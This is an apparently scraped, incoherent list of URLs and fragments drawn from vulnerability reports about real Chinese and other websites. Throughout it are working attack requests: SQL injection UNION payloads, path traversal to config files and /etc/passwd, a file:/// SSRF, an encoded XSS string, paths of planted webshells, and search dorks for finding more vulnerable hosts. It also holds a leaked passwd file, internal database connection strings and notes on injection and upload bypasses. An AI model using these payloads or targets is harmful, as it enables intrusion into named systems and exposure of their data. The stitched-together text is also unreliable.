http://www.sgtjb.com/ws2004/model/login1.asp http://www.sdwhys.com/ws2004/model/login1.asp http://www.zjnksyzx.com:8801/ws2004/model/login1.asp http://www.dlwsxx.com/ws2004/Model/login1.asp http://www.cqoppo.com/Login.aspx http://www.cqoppo.com/fckeditor//editor/dialog/fck_about.html http://www.cqoppo.com//upload/Image/1.aspx https://msdn.microsoft.com/en-us/library/ms682425.aspx http://112.64.185.162/ http://112.64.185.162/user/ http://login.zjdpf.org.cn:9000/report/login.action http://paoxue.com/home.php?mod=space&uid=1&do=profile http://paoxue.com/space-uid-1.html http://www.chinalaw.gov.cn/ http://admin.yoloho.com/newdayima/soft_feedback http://admin.yoloho.com/index https://github.com/lili6/tessar-server/blob/0f76d068af65a783d16d5124e576c323d292825c/tessar/src/main/java/com/cyou/scheduler/crashscheduler/db/mongodb/SendEMailMongoDBPage.java http://www.e-chinalife.com/cardmisfile/uploadFiles/download.jsp?type=1&PDFnameArr=../../../index.jsp&Onputname=1.jsp http://www.e-chinalife.com/selfcard/mis/manager/login/frmLogin.jsp http://211.100.41.254/.svn/entries http://211.100.41.200/.svn/entries http://211.100.41.149/.svn/entries http://www.airchinajet.com/download.php?url=2013/../../../config.php http://www.airchinajet.com/index.php/5167b1c10a?id=-1%20UNION%20SELECT%201,2,3,4,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39-- http://bangong.xcar.com.cn/ http://bangong.xcar.com.cn/Admin/index.php?s=/Public/main.html http://lsp.baidu.com/ http://lsp.baidu.com/cgi-bin/printenv http://159.226.97.60:8080/bns/front/Index/showAddPage.do http://159.226.97.60:8080/bns/resume/ResumeInfo/edit.do?id=80& http://www.hbjt.gov.cn http://www.hljjj.gov.cn http://www.scjt.gov.cn/ http://www.xmcp.gov.cn/ www.ycjtj.gov.cn http://ne.byd.com.cn/StorageModel/votermainDispatcher.action http://www.zxzjj.gov.cn/ http://www.npc.gov.cn/ 
http://admin.xiaomm.com.cn/AppManage/FeedbackInfoList.aspx?random=1423535935 http://admin.xiaomm.com.cn/Default.aspx# http://apk.gfan.com/Product/App1022436.html http://www.mumayi.com/android-910343.html http://www.wandoujia.com/apps/com.app.sister http://sgdaj.shaoguan.gov.cn/photo_admin.asp www.bitpress.com.cn/index.php?id=6 http://220.191.244.23/sft-jcflfw/public/login/preLogin.action www.minshengec.com/common/getListCookie.jhtml?callback=jQuery183038446558504106043_1423473509362&cookName=%5B%22memberUsername%22%2C%22JSESSIONID%22%2C%22mssc_sid%22%5D&_=1423473510555 http://dns1.enorth.com.cn/admin http://dns1.enorth.com.cn/uploads/titlepic/R9Pl5KpaHtgaOoix.php http://211.99.203.85/book.action www.moyoyo.com http://v.moyoyo.com/web/list?cid=6 http://v.moyoyo.com/web/list?cid=6 http://www.elife.com/ http://cms.51yund.com/sport/index.php http://www.timber2005.com/ http://ischoolgu.xmu.edu.cn:8002/jyzdzx/admin/admin_xzzx_add.asp http://ischoolgu.xmu.edu.cn:8002/jyzdzx/countinfo.asp http://ischoolgu.xmu.edu.cn:8002/jyzdzx/countipdisplay.asp http://ischoolgu.xmu.edu.cn:8002/jyzdzx/admin/ www.super8.com.cn http://www.super8.com.cn http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://www.elife.com/forum.php?mod=viewthread&tid=221463&pid=1655935&page=7&extra=#pid1655935 http://www.flyme.cn/firmwarelist.jsp?modelId=8&type=1 http://uxss.sinaapp.com/ site:spider2.enorth.com.cn http://spider2.enorth.com.cn:8000/order/admin_user_order/user_sel_tag_or_url/user_sel_tag_or_url_action.do?action=web_url_list&ousvo.page_no=292 http://spider2.enorth.com.cn:8000/order/admin_user_order/list_snatch_urls/list_snatch_urls.do?action=list&pusvo.is_init=true&initpusvo.url_id=13368 http://h3community.h3c.com:80/Member/RegistrationPage.aspx 
http://www.sdwhys.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.suyaxing.com:81/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.hwsyxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://www.dlwsxx.com/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1=0 http://58.56.38.170/SM2005/student/StuCJ/StuResult.asp?QueryFs=4&txtStu=aaaabn%27&ShowFS=1&StartKSID=3&EndKSID=15&checkbox1 http://221.208.242.211:9119/karaoke-province-admin/login http://www.tophr.net/InterView/news.asp?id=231 http://www.dajie.com/profile/28225574?f_fid=146981430&f_type=91&f_actorId=28225574&f_category=hotnewsfeed&f_view=0 http://www.dajie.com/group/1054/topic/1891845?f_fid=146970430&f_type=92&f_actorId=28225574&f_category=userminifeed&f_view=0 http://zjlx.zjol.com.cn/manage/index.jsp url:http://www2.cmu.edu.tw/~alumni/admin/index.php http://**.**.**/login.jsp http://www.ln86e.com/),是网龙公司华渔教育的产品。 http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc/passwd%2500.jpg http://contests.travel.aol.com/pages/aoltravelcontest/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Froot%252F.bash_history%2500.jpg http://58.83.193.121/sxymjdmp/order/orderFlowQueryForOutsideByCwb http://txd.explink.cn/txddmp/login 
http://58.83.193.121/bjzzyt/order/wumaorderFlowQueryForOutsideByCwb?cwbs=14050467367941&sign=750fe041f4d84a00ec90cb6776f2ee1a http://58.83.193.121/bjzzyt/order/wumaorderFlowQueryForOutsideByCwb?cwbs=14061987681145&sign=9d20df7d173f62f7423608724df9a2b0 http://58.83.193.121/bjzzyt/order/wumaorderFlowQueryForOutsideByCwb?cwbs=14051896845242&sign=210ab730ba3f4bc18e761a08bd9104c6 http://58.83.193.121/ams/login http://souky.eol.cn/fenshu_search_34.php?=88952634&schoolid=5&xueke=01&xuewei_class=1 http://haogaozhong.eol.cn/school_area.php?province=11 http://help.ads.renren.com/help-3-1.html http://wooyun.org/bugs/wooyun-2010-094793 http://dcrm.byd.com.cn http://jnbt.haier.net/login.ered?reqCode=logout http://edu.gooann.com/ http://homesecurity.haier.com/HaierAF/login4webapp/login.action http://store.iqiyi.com/ http://car.51yund.com/mobile/get_all_nopay_order.php http://car.51yund.com/mobile/get_all_pay_order.php http://car.51yund.com/mobile/order_info.php?order_id=2755 http://www.rpsg.sgcc.com.cn/2014admin/ http://www.rpsg.sgcc.com.cn/2014admin/others.asp?mudi=download_EN_CN&n=index.asp&ENname=../config.asp http://care2012.acftu.org/data/print/info_list.jsp?family_type=1&record_id=33888891 http://care2012.acftu.org/data/print/info_list.jsp?family_type=1&record_id=33888890 http://univ1.zte.com.cn/XsExam/Application/Certification/UICertificationQuery.aspx http://www.fjqz-l-tax.gov.cn/TaxWeb/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector shell-url:http://www.fjqz-l-tax.gov.cn/TaxWeb/UserFiles/Image/job.jsp http://chk.ehuatai.com/wap/login/loginAction-userLogin.action http://chk.ehuatai.com/wap/login/loginAction-userLogin.action jar:/home/htusr/apache-tomcat-5.5.25/bin/commons-logging-api.jar http://218.30.22.96/reg_app/dx_ajax.php?key= root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin 
sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin www:x:501:501::/home/www:/sbin/nologin nagios:x:502:502::/home/nagios:/bin/bash cacti:x:503:504::/home/cacti:/bin/bash nginx:x:504:505::/home/nginx:/sbin/nologin http://ffp.scal.com.cn:80/ http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11812 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11879 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11880 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11881 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11901 android:allowBackup="true"(结点设置可被外部调用导致敏感信息泄露) http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11905&ordernumber=788750871801 http://www.hp1997.com/MyCenter/MyOrderInfo.aspx?orderid=11906&ordernumber=093750871811 http://iwangzu.chexiang.com/rent.php?car_status=1 http://sqlmap.org http://mxd.games.sdo.com/ 
http://124.127.48.20:8080/fw/mindex.do?tab=home http://124.127.48.19/web/Login.aspx http://124.127.48.21:8080/event/index3.do http://g189.cn/yxds/team_detail.php?team_id=240 http://218.87.71.12 http://english.sinopec.com/web.tar.gz http://cpro.baidustatic.com/cpro/ui/c.js http://**.**.**/_ http://**.**.**/form.jsp http://218.201.32.57/file/upload/2015-02-12/jspma1.jsp http://www.rzrsrc.com/rz12333/e/tool/szyf/?act=bysdacx1 http://10.10.116.11 http://t.cn/RwbLKDx http://share.renren.com/share/buttonshare.do?link=http://t.cn/RwbLKDx http://rwjd.zjgsu.edu.cn/content/detail.php?sid=23&cid=514&id=1006 http://www.zjvcc.edu.cn/content/detail.php?sid=2&cid=578&id=5189 http://zjrwxy.com/content/detail.php?sid=12&cid=577&id=1059 http://zgysx.hznu.edu.cn/content/detail.php?sid=39&cid=703&id=2178 http://hbpj.zfc.edu.cn//content/detail.php?id=1405&sid=3&cid=655&tid=667 http://www.nlgjn.com/content/detail.php?sid=12&cid=576&id=1104 soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://sys.zs91.com soap:Body http://optimization.aol.com/tools/roboto/?url=file:///etc/passwd http://down.qibosoft.com/down.php?v=v7 http://121.10.6.139/khsafe/jsp/login!doLogin.action ftp://124.193.207.130/ http://www.viewgood.com/ http://demo.viewgood.com先注册个账号 http://www.ztemall.com http://www.ztemall.com/pay.html?xsbh=XX20150212006 http://www.fj51e.cn/),看网站脚注,是网龙的 https://search.szfw.org http://www.szfw.org/ https://search.szfw.org/entry.php?action=getUserinfo2&userId=1 https://search.szfw.org/entry.php?action=getUserinfo2&userId=1%20UNION%20select%201,2,3,4,5,6,7,8,9,10,11# http://222.215.68.133:9090/tm/toLogin.action http://yfg.mszq.com/console http://www.4007787878.com/Order/OrderDetail?orderCodeOnline=30319 http://dayi.wendu.com http://www.wendu.com//app/xq17.txt http://eduyun.nwnu.edu.cn/websites/ 
http://eduyun.nwnu.edu.cn/websites/index.php?g=CommonTempt&m=Article&a=index&t=CommonTempt1&webid=1000043&id=1000077&channelid=1000079&articleid=1001078 http://eduyun.nwnu.edu.cn/websites/index.php?g=Admin&m=Index&a=index# www.kx315.net http://220.250.64.17:8080/ http://www.shangh.12306.cn/Dzsw/Shky/hwky.nei/dbwd.action http://www.shangh.12306.cn/Dzsw/Shky/hwky.nei/bak.jsp https://125.70.228.81 http://blog.99.com http://www.eduwind.com/ http://demo.eduwind.com/course/index?categoryId=8'加个'直接报错,存在注入 http://www.keyisou.com//course/index?categoryId=8 http://shanbay.com/ http://passport.mop.com/ http://jwc.whut.edu.cn/Home/Login.aspx http://ee.dgut.edu.cn/do/s_rpc.php存在注入 http://www.womai.com/Member/AddAddress.do https://222.177.8.139 http://192.168.0.13/npowork/wssb/index/index.jsp http://192.168.0.27:8088/web/UserAction.do?method=getLoginInfo http://192.168.0.22/web/index.jsp http://192.168.0.25/ http://192.168.0.25/test.txt http://219.142.81.117:8080/tjcgs/ jdbc:oracle:thin:@10.90.14.168:1521:cgsmps jdbc:oracle:thin:@10.90.1.101:1521:cgsmpdb jdbc:oracle:thin:@localhost:1521:ora11 jdbc:oracle:thin:@127.0.0.1:1521:ORA721 jdbc:oracle:thin:@10.90.12.192:1521:orcl jdbc:oracle:thin:@localhost:1521:ORA721 http://appms.xichebang.com.cn:8000/admin/ http://group.zcool.com.cn/ http://116.239.2.6/ HTTP://**.**.** http://www.gps1388.com/weblogin.aspx http://www.njjtgf.cn/WorkGuide01.aspx?classcode=/BSZN/ZSBZ/ http://gongcheng.haier.net:8011/security/loginInit.action http://202.108.116.132:8080/order3b/servlet/logout http://www.hdswsj.gov.cn/ http://www.hdswsj.gov.cn/votes/votes_show.action?vi=4 http://202.102.101.42/login.do?loginForm.loginname=eqiyun&loginForm.password=- http://hk5.midea.com/c/products.php?id=1 http://hk5.midea.com/c/products_cat.php?cat=1&id=16 http://hk5.midea.com/c/products_cat.php?cat=21&id=1 http://hk5.midea.com/c/products_details.php?cat=26&id=16&line=1&pid=108 http://hk5.midea.com/c/products_details.php?cat=26&id=16&line=67&pid=1 
http://hk5.midea.com/c/products_line.php?cat=23&id=16&line=65 http://hk5.midea.com/c/products_line.php?cat=23&id=1&line=65 http://hk5.midea.com/c/products_line.php?cat=23&id=16&line=1 http://hk5.midea.com/c/project.php?id=1 http://www.jdyyeb.com/xt_zhuanjia_view.php?pid=62&class1=48&id=374 inurl:productshow.asp?id= http://www.fhsjdz.com/productshow.asp?id=5 http://www.dodo-beauty.com/productshow.asp?id=801 http://www.vivid-ledlighting.com/productshow.asp?id=410 http://www.szv-sys.com/productshow.asp?id=425 http://www.topwellce.com/productshow.asp?id=448 http://119.254.81.171:8080 http://wooyun.org/bugs/wooyun-2015-093899 http://www.sharkpark.cn/manager/home#alliance_applies/edit/54cb041e6f5ca5fb028b4656?0.2013901132158935 http://www.wulmq.12306.cn:7001/Dzsw/Shky/hwky.nei/productdesfwzn.action http://www.ln86e.com/ajax/submit_tj.ashx?lessionID=226&lessonptype=283&lessonpmode=True www.bzdc.cn http://www.bzhb.gov.cn/Body.asp?ID=14424 http://www.bzagri.gov.cn/Body.asp?ID=7797 http://www.bzkp.gov.cn/Body.asp?ID=1084 http://www.tjxwsj.cn/Body.asp?ID=3680 http://www.pcjyty.gov.cn/Body.asp?ID=4523 http://www.bzqjxj.gov.cn/Body.asp?ID=57 http://tjzyjy.cn/Body.asp?ID=181 http://www.bzaj.gov.cn/Body.asp?ID=9117 http://www.bzsglj.cn/Body.asp?ID=579 http://www.scpcgt.gov.cn/Body.asp?ID=7233 http://www.tjxyjj.cn/Body.asp?ID=491 http://www.bzkjpx.com/Body.asp?ID=143 http://bzqtzb.com/Body.asp?ID=256 http://www.bzsngw.gov.cn/Body.asp?ID=776 http://www.bzrkjsw.gov.cn/Body.asp?ID=495 http://www.bzsglj.cn/Body.asp?ID=579的: http://tjzyjy.cn/Body.asp?ID=181的: http://www.bzhb.gov.cn/Body.asp?ID=14424的: http://img02.res.yoho.cn/headimg/2015/02/14/17/02ff707bc3e25b533bf2e4ad4ab135d0fa.html http://i.veryeast.cn/user/login?redirect=http%3A%2F%2Fmy.veryeast.cn%2Fuser%2Fsetting%23logout http://tch.wlxx160.com http://www.txtdcb.gov.cn:88/ http://www.txtdcb.gov.cn:88/add.aspx http://www.txtdcb.gov.cn:88/imag/hongxian/2015_02_14_11_31_38泰兴市挂[2014]43号1.aspx http://www.zteup.com/view/toindex 
Host:app.zteup.com:8070 http://app.zteup.com:8070/是没办法访问的,那就在找找图片在哪,再去拦截一下请求身份证图片的HTTP消息: http://img3.zteup.com,那么身份证的地址是在: http://img3.zteup.com/upload/20150211110753964528486.jpg http://img3.zteup.com/upload/20150204170007915167538.jpg https://account.oppo.com/index.php?q=user/login&back=http%3A%2F%2Fwww.oppo.com%2F http://119.254.111.208/users/login http://118.145.26.136/ http://118.145.26.136/dede/login.php?gotopage=%2Fdede%2F http://125.88.10.244/iCloud/login.html http://125.88.10.244/iCloud/inbox.html https://github.com/sensepost/reGeorg http://itchenyi.blog.51cto.com/4745638/1137143 http://www.codesky.net/article/201207/171461.html http://localhost/3gcms/index.php?s=guestbook http://wooyun.org/bugs/wooyun-2010-069115 inurl:article.php?action=list&typeid= http://www.cjpmp.com/cms/article.php?action=list&typeid=99 http://www.hnmz.gov.cn/new/cms/article.php?action=list&typeid=17 http://www.jpcm888.com/cms/article.php?action=list&typeid=12 http://www.zhsdz.com/cms/article.php?action=list&typeid=2 http://www.yfzyxx.com/cms/article.php?action=list&typeid=11 http://www.ahdlgcxx.cn/cms/article.php?action=list&typeid=24 http://www.cjpmp.com/cms/article.php?action=list&typeid=99 http://www.hnmz.gov.cn/new/cms/article.php?action=list&typeid=17 http://www.jpcm888.com/cms/article.php?action=list&typeid=12 http://www.zhsdz.com/cms/article.php?action=list&typeid=2 http://www.yfzyxx.com/cms/article.php?action=list&typeid=11 http://www.ahdlgcxx.cn/cms/article.php?action=list&typeid=24 http://baike.baidu.com/uc/draftlist http://218.94.1.85 http://157.122.153.67:9000/khyx/ http://rb.tcl.com/ http://rb.tcl.com:80/ inurl:bulletinPageList.jsp?groupId= inurl:bulletinBrowse.jsp?Id= inurl:bulletinList.jsp http://yx.cau.edu.cn/bulletinPageList.jsp?groupId=1 http://yx.cau.edu.cn/bulletinList.jsp?groupId=1 http://yingxin.ncepu.edu.cn/bulletinPageList.jsp?groupId=1 http://yx.tjcu.edu.cn/bulletinPageList.jsp?groupId=1 http://www.shiyuesoft.com/cases/case.html 
http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp_ http://**.**.**/syfile/ckeditor.jsp http://www.didapinche.com:9022/app/plaza/?city_id=1&type=passenger&user_cid=90400219-5537-4be2-b2aa-d33364b38723 http://sso.maxthon.cn/quit.php这个页面被删除。 https://125.64.219.230/ http://gzlishun.yupu.cn/Default.asp http://www.mprlzybz.gov.cn/newsmore1.asp?lei=3&sjg=11 http://asc.h3c.com/ http://web.sh.ptt.189.cn/company/login.do inurl:img_info.asp?num= http://www.hzkfqedu.com/img_info.asp?num=187 http://www.hzxhgb.com/img_info.asp?num=11 http://fl.hanzhong.gov.cn/img_info.asp?num=703 http://www.yxgtj.net/img_info.asp?num=187 http://www.hzdzdd.cn/img_info.asp?num=323 http://www.ssxgxs.com/admin/admin_login.asp http://zjykcoop.cn/admin/Admin_Login.asp http://gxs.qz.gov.cn/admin/Admin_Login.asp http://www.zjxccoop.com/admin/Admin_Login.asp http://www.tscoop.cn/admin/Admin_Login.asp http://www.yongjiacoop.com/admin/Admin_Login.asp http://www.racoop.com/admin/Admin_Login.asp http://osp.sdo.com:8080/Exterior/Login.aspx http://www.gzbg100.cn/preferentialPage/ly_iyouhui.aspx?cityid=0451 http://123.167.5.158:9801/docs/funcspecs/2.jsp?sort=1&editfile=c%3A%2Fboot.ini http://note.99.com和http://gm.99.com//存在 http://t.hb.189.cn/备份.rar这里得到后台。 inurl:jieshao.asp?num= http://www.xxgtj.com/jieshao.asp?num=72 http://www.yxgtj.net/jieshao.asp?num=72 http://gtj.nanzheng.gov.cn/jieshao.asp?num=72 http://gtj.hzedz.gov.cn/jieshao.asp?num=63 http://www.dhtyhotel.com/jieshao.asp?num=62 http://www.hdshgs.com/jieshao.asp?num=64 http://www.hzljjz.com/jieshao.asp?num=68 http://manage.zhidao.189.cn/Index.aspx http://js.189.cn/emall/hdscOP/jsp/openter.jsp http://jwc.zust.edu.cn/)最下面有网站管理的入口,点进去输入用户名admin,猜对密码就能登录啦。 
http://www.yundaex.com/de/admin/idcard/idCard.php此处上传上传身份证可以直接截断为php文件 inurl:jzzc_list.asp?smallclassname= http://www.jshuaqiao.com/jzzc_list.asp?smallclassname= http://www.wyxzfw.com/jzzc_list.asp?smallclassname= http://www.hyxzfw.gov.cn/jzzc_list.asp?smallclassname= http://60.8.102.174/jzzc_list.asp?smallclassname= http://www.gzshebao.org/jzzc_list.asp?smallclassname= http://gaokao.ahedu.gov.cn/admin4/show.asp?id=18453 http://mail.haiertvbic.com/ http://mail.haiertvbic.com/biddetail.php?id=9 http://121.207.247.161:8080/ http://121.207.247.161:8080//php/setup.php http://xzfw.maoming.gov.cn/html/nbszn.html?cT=838 http://wsbs.dpxq.gov.cn/ http://wsbs.dpxq.gov.cn/bsdt_detail.jsp?ztmsIndex=1 http://wsbs.dpxq.gov.cn/street/guanxiafanwei.jsp?bguid=1&name= http://wsbs.dpxq.gov.cn/street/zjfw_detail.jsp?bguid=1&ztmsIndex=89 http://wsbs.dpxq.gov.cn/street/zjfw_detail.jsp?bguid=1 http://jiuye.swjtu.edu.cn/jdjy/NewsShow/NoticeShow.aspx?id=1496 http://map.yundasys.com:11080/action/gis/branch/loadBranch?orgCode=100410&action=edit http://map.yundasys.com:11080/action/gis/branch/loadBranch?orgCode=200410&action=edit inurl:searchresult.jsp?ItemName= http://117.40.186.185:8008/outportal/channel/searchresult.jsp?ItemName= http://www.xsxzfwzx.gov.cn/channel/searchresult.jsp?ItemName= http://www.gzwssp.gov.cn/channel/searchresult.jsp?ItemName= http://111.75.245.163/channel/searchresult.jsp?ItemName= http://xzfw.ncqsh.gov.cn/channel/searchresult.jsp?ItemName= http://www.qhdzw.gov.cn/channel/searchresult.jsp?ItemName= http://wssp.shicheng.gov.cn/channel/searchresult.jsp?ItemName= http://www.cyxspw.com/channel/searchresult.jsp?ItemName= www.zjzs.net https://219.153.5.247/ https://219.153.5.247/AccountAction.action https://219.153.5.247/AccountAction.action http://tuan.gzbg100.cn/sysadmin/Login.aspx http://**.**.**/khyy/login.asp http://1.202.236.211/FrameWork/Login.aspx http://1.202.236.211/FlightReserve/Insurance/InsuranceList.aspx http://1.202.236.215/Framework/Frame.aspx 
http://1.202.236.211/Framework/Frame.aspx http://219.147.168.104/Kjpt/platform/login.htm http://219.147.168.104/Kjpt/Register/sysApp_uploadUserUnitfjFile.action http://itsm.yundasys.com:45177/itsm-webapp/pages/login.jsp http://ams.yundasys.com:11366/hkgl/index.jsp http://www.zzmetro.com/feedback.aspx http://218.87.140.106/ http://oa.jxgxedu.gov.cn/ http://59.55.33.137:8010/ http://59.55.33.137:8040/ http://www.gznoa.com/ http://ckxx.hebeea.edu.cn:8080/ http://223.203.209.143/cacti/cacti.sql http://223.203.209.143/cacti/graph_view.php?action=tree&tree_id=2&leaf_id=8 http://www.chinabp.com.cn/articleWeb_findArticleByArticleId.action http://www.ddb.xm.gov.cn/ftb.imagegallery.aspx http://116.255.240.54/Login.aspx inurl:/VOD2005 http://vod.ahlib.com/vod2005/VodCenter/OpenStationFile.asp?ID= http://118.112.184.145:88/vod2005/VodCenter/OpenStationFile.asp?ID= http://vod.whedu.net/vod2005/VodCenter/OpenStationFile.asp?ID= http://www.sdwhys.com/vod2005/VodCenter/OpenStationFile.asp?ID= http://www.zjk2z.cn/vod2005/VodCenter/OpenStationFile.asp?ID= http://xinzhongedu.vicp.net/vod2005/VodCenter/OpenStationFile.asp?ID= http://v.gzqjy.cn/vod2005/VodCenter/OpenStationFile.asp?ID= http://vod.ahlib.com/vod2005/VodCenter/OpenStationFile.asp?ID= http://vod.ahlib.com/vod2005/VodCenter/DoDownLoad.asp?ID= http://118.112.184.145:88/vod2005/VodCenter/DoDownLoad.asp?ID= http://vod.whedu.net/vod2005/VodCenter/DoDownLoad.asp?ID= http://www.sdwhys.com/vod2005/VodCenter/DoDownLoad.asp?ID= http://www.zjk2z.cn/vod2005/VodCenter/DoDownLoad.asp?ID= http://xinzhongedu.vicp.net/vod2005/VodCenter/DoDownLoad.asp?ID= http://v.gzqjy.cn/vod2005/VodCenter/DoDownLoad.asp?ID= http://vod.ahlib.com/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://118.112.184.145:88/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://vod.whedu.net/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://www.sdwhys.com/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= 
http://www.zjk2z.cn/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://xinzhongedu.vicp.net/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://v.gzqjy.cn/vod2005/VodCenter/Player/ClosePlayRes.asp?UserName= http://vod.ahlib.com/vod2005/public/asp/Microcode/data.asp?CodeName= http://118.112.184.145:88/vod2005/public/asp/Microcode/data.asp?CodeName= http://vod.whedu.net/vod2005/public/asp/Microcode/data.asp?CodeName= http://www.sdwhys.com/vod2005/public/asp/Microcode/data.asp?CodeName= http://www.zjk2z.cn/vod2005/public/asp/Microcode/data.asp?CodeName= http://xinzhongedu.vicp.net/vod2005/public/asp/Microcode/data.asp?CodeName= http://v.gzqjy.cn/vod2005/public/asp/Microcode/data.asp?CodeName= https://183.230.36.210/index.php http://huaban.com/pins/326847433/comments/ URL:http://huaban.com/pins/326847433/comments/ Method:POST Referer:http://huaban.com/pins/326847433/ text:test http://huaban.com/pins/326847433/comments/ http://xjz.zjol.com.cn/v2/reporteruser.aspx?id=3337670 http://218.87.140.106/ http://oa.jxgxedu.gov.cn/ http://59.55.33.137:8010/ http://59.55.33.137:8040/ http://www.gznoa.com/ http://wooyun.org/bugs/wooyun-2015-096707,是因为没有对KEY进行过滤,造成了注入,修复后的代码是这样对KEY进行过滤的。 http://rctdlz.cn/DocumentPrint/ContractApplyTransfer.aspx?id= http://221.1.104.11:8011/DocumentPrint/ContractApplyTransfer.aspx?id= http://221.2.171.59:8300/DocumentPrint/ContractApplyTransfer.aspx?id= http://demo.inongyou.cn/DocumentPrint/ContractApplyTransfer.aspx?id= http://60.2.214.118:8088/DocumentPrint/ContractApplyTransfer.aspx?id= http://121.17.2.52/DocumentPrint/ContractApplyTransfer.aspx?id= http://61.186.154.210:8088/DocumentPrint/ContractApplyTransfer.aspx?id= http://so.269.net/more.php?typeid=1 http://www.sdqx.gov.cn/ http://220.191.211.55/risen/public/forcePwd.action 
http://ah2.zhangyue.com/zybook/u/p/user.php?key=1U1&usr=iXXXX7591&rgt=7&p1=150213162338630022&pc=10&p2=108695&p3=770003&p4=501603&p5=19&p6=&p7=JJAAAFFFJJGIEH&p9=2&p12=&p16=Coolpad+V1-C&p21=3&p22=4.4.4&zysid=d295ceb19323e12b7bb4c8b0760620c0&zysign=R0mUI23JFammzJpCL3noDVYCh6eetuq2VVm%2BMJODSDzNu1O9hrdC70saZ9%2FD%2BBnuI4R2ALb32BRucuRx0YcgKQ%3D%3D http://211.143.125.238/org/login.do http://121.14.117.254:8080/ http://121.14.117.254:8080/resin-doc/viewfile/?contextpath=/&servletpath=&file=index.jsp http://202.85.212.123/rms_R/login!login.do http://exam.zhongsou.com/index.php/studay/pxzlc/27 http://lt.zhongsou.com/aulogin/login http://d3m.zhongsou.com/Login http://e.zhongsou.com/user site:zhongsou.com http://musicc.zae.zhongsou.com/admin/lists?version=3&md5=3c76d020e9d3d5763971a3992c55ea62&page=2&return_url=http%3A%2F%2Fmusic http://wooyun.org/bugs/wooyun-2010-079089 http://61.156.3.61/xiangqing.jsp?sm_no=135215 http://61.156.3.61/xiangqing.jsp?sm_no=127744 http://sqlmap.org 